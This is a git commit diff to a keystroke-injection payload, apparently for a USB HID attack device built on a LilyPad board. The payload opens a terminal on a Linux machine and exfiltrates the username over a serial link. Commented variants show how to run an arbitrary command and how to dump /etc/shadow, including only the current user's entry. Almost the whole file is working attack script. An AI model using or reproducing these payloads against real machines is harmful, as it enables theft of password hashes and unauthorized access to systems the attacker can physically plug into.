Update Payload LinSerialEXFIL

exploitagency · Oct 29, 2017 · d8e90f2 · d8e90f2
1 parent ce198d7
commit d8e90f2
Showing 1 changed file with 7 additions and 5 deletions.
diff --git a/payloads/LinSerialEXFIL.txt b/payloads/LinSerialEXFIL.txt
@@ -1,13 +1,15 @@
 Rem: Exfiltrate UserName from Linux Box using a Serial Link
-DefaultDelay:1000
+DefaultDelay:50
 Press:134+195
+CustomDelay:1000
 PrintLine:gnome-terminal
 CustomDelay:1000
-Rem: Exfiltrate Username then BlinkLED:3 to signal when done exfiltrating data
-PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(whoami) > /dev/serial/by-id/*LilyPad*;echo "BlinkLED:3" > /dev/serial/by-id/*LilyPad* &
+Rem: Exfiltrate User and BlinkLED:3 when done
+PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(whoami)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad*
+Rem: -
 Rem: More examples below
 Rem: PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(whoami) > /dev/serial/by-id/*LilyPad*
-Rem: In example below replace "LINUX COMMAND HERE": PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(LINUX COMMAND HERE) > /dev/serial/by-id/*LilyPad*
-Rem: Dump shadow file: stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(cat /etc/shadow) > /dev/serial/by-id/*LilyPad*
+Rem: In example below replace "LINUX COMMAND HERE": PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(LINUX COMMAND HERE)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad*
+Rem: Dump shadow file: PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(cat /etc/shadow)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad*
 Rem: Dump shadow file for current user: stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(cat /etc/shadow|grep $(whoami)) > /dev/serial/by-id/*LilyPad*
 Rem: Another way to access device: PrintLine:stty -F /dev/ttyACM0 38400;echo "SerialEXFIL:"$(whoami) > /dev/ttyACM0